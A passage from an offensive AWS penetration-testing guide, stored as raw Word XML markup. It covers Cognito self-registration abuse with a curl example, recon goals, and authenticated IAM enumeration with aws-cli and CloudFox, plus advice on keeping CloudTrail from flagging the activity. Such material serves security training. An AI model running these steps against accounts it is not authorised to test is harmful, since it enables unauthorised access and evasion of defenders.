          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>apktool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + grep for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda-url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on iOS IPA decrypt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051FF38" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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GitHub public code search (`"lambda-url" site:github.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8EC80" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Certificate transparency logs, when customers attach custom domains to API Gateway and Lambda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555A637" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.8  Cognito user-pool enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6834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Cognito user pools expose a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sign-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> API that frequently allows unauthenticated account creation with only an email address. Many public-facing applications use Cognito as their identity layer — a pentester can often simply register a user and inherit whatever default group permissions new users receive. Combined with SSRF (Chapter 6), the newly-created Cognito user becomes an entry into the AWS backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76A823"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curl -s -XPOST https://cognito-idp.us-east-1.amazonaws.com/ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D17CA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'X-Amz-Target: AWSCognitoIdentityProviderService.SignUp' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53266863" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Content-Type: application/x-amz-json-1.1' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F8D2A"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 xml:space="preserve">  -d '{"ClientId":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7abcexampleclientid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>","Username":"test@attacker.tld","Password":"Pass1!Pass1!"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5726A6"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{"CodeDeliveryDetails":{"AttributeName":"email","DeliveryMedium":"EMAIL","Destination":"t***@attacker.tld"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D729674" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># user created, confirmation code sent to attacker-controlled inbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002CC6A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.9  Putting it together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668C40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full unauthenticated recon pass against a domain should yield, within 30–60 minutes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35A30E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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AWS account ID (or a small set of candidates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD0763" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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list of 5–50 public S3 buckets, at least some of which contain interesting objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED11663" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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list of public AMIs, snapshots, and RDS snapshots owned by the target account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654C15C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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list of publicly reachable services (API Gateway, Lambda URLs, CloudFront distributions, ALBs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8AD34B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Candidate role names inferred from the target's public documentation, GitHub organization, and developer blogs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8BB29" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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working Cognito user (if the target uses Cognito).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199108B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That becomes the input to Chapter 5, where we assume at least one set of valid credentials has been obtained and move to authenticated enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07E869" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066BEA20" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Account-ID attribution is the first move and unlocks nearly every subsequent primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75018957" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Public buckets, AMIs, snapshots, and function URLs are indexed and discoverable without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FEC5E4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Role-name brute force via AssumeRole is productive but lands in the target's CloudTrail — use it with awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA9C44" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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DNS and CDN patterns reveal AWS architecture from the outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57498769" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Cognito and Lambda-URL exposures are two of the newest-worth-checking recon lanes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCB584" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="2045787112"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C51C9"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Authenticated Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A54C5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="1305506088"/>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61A31814" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="1305506088"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">You have credentials. Now translate them into a complete picture of the account. Cover the essential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>enumeration discipline, CloudFox end-to-end, Pacu's enumeration modules, and how to combine ScoutSuite/Prowler/CloudSploit output into a prioritized attack-path list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFA3B0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The moment you import a fresh access-key pair, your first job is not to attack — it is to orient. A sophisticated blue team is already watching those keys land in CloudTrail; every probing API call you make adds to the alert. The goal of enumeration is to maximize information gained per API call while building a complete-enough permissions graph to plan the next move.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46976A68" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.1  The first five commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D9FEF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Every AWS engagement starts the same way:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16DB69"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sts get-caller-identity --profile target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC4641"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214FEFE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"UserId": "AIDAEXAMPLE7KXYZ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B22A1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"Account": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>444455556666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58045871"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r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Arn": "arn:aws:iam::444455556666:user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ci-deploy-bot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1BC78"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58682421"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get-account-authorization-details --profile target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3EEC57" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># huge JSON — users, roles, groups, and all attached + inline policies in one call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDA417"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organizations describe-organization --profile target 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CE212"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An error occurred (AccessDeniedException) when calling the DescribeOrganization operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC98C9A"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User: arn:aws:iam::444455556666:user/ci-deploy-bot is not authorized to perform: organizations:DescribeOrganization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523D566" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># error itself is information: the account IS part of an org (non-org accounts return a different error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE81CD"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ec2 describe-regions --profile target --query 'Regions[].RegionName' --output text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49863D7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us-east-1  us-east-2  us-west-1  us-west-2  eu-west-1  eu-central-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF197BD"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for r in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856F164" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "=== $r ==="; aws ec2 describe-instances --region $r --query 'Reservations[].Instances[].InstanceId' --output text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A779153"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EEAB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These five calls produce a ton of intelligence: the principal ARN (attached to a user or role), the complete IAM graph (authorization-details), the org membership, the opted-in regions, and a first-pass EC2 inventory. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>get-account-authorization-details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is denied, fall back to enumerating per-object with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>list-users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>list-roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>list-policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, and attached-policy calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4ED528" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1092122366"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E542A3C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="1092122366"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>get-account-authorization-details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">is sometimes the single loudest call you can make — one API invocation that returns the entire IAM state, and one row in CloudTrail that a well-tuned detection will flag as anomalous for a non-admin principal. If the engagement is OPSEC-critical, avoid it and build the picture with many smaller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>list-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls distributed over time and across principals you have collected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE51D4E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.2  CloudFox end-to-end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A22D8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CloudFox is the closest thing to a "one command that gives you the account" in the AWS offensive tooling space. It iterates all regions, enumerates IAM, inventories compute/storage/data, identifies secrets, and emits Markdown, HTML, and CSV reports that are readable by humans at 2 a.m. Its value is not novel techniques — it is that it runs all of them and formats the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA4980"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cloudfox aws --profile target all-checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA26DB9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudfox] Runtime: 3m 42s across 6 regions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08580ADB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudfox] Output: ~/.cloudfox/aws/444455556666/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A53353" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudfox] Generated reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AEC0BB"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inventory.md           — 412 assets across 6 regions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24AE03"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iam-permissions.md     — 28 users, 59 roles, 117 policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19346808"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iam-simulator.md       — 31 users with ≥1 potentially privileged action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87C490"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secrets.md             — 7 secrets referenced in EC2 userdata / Lambda env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C90FF"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endpoints.md           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
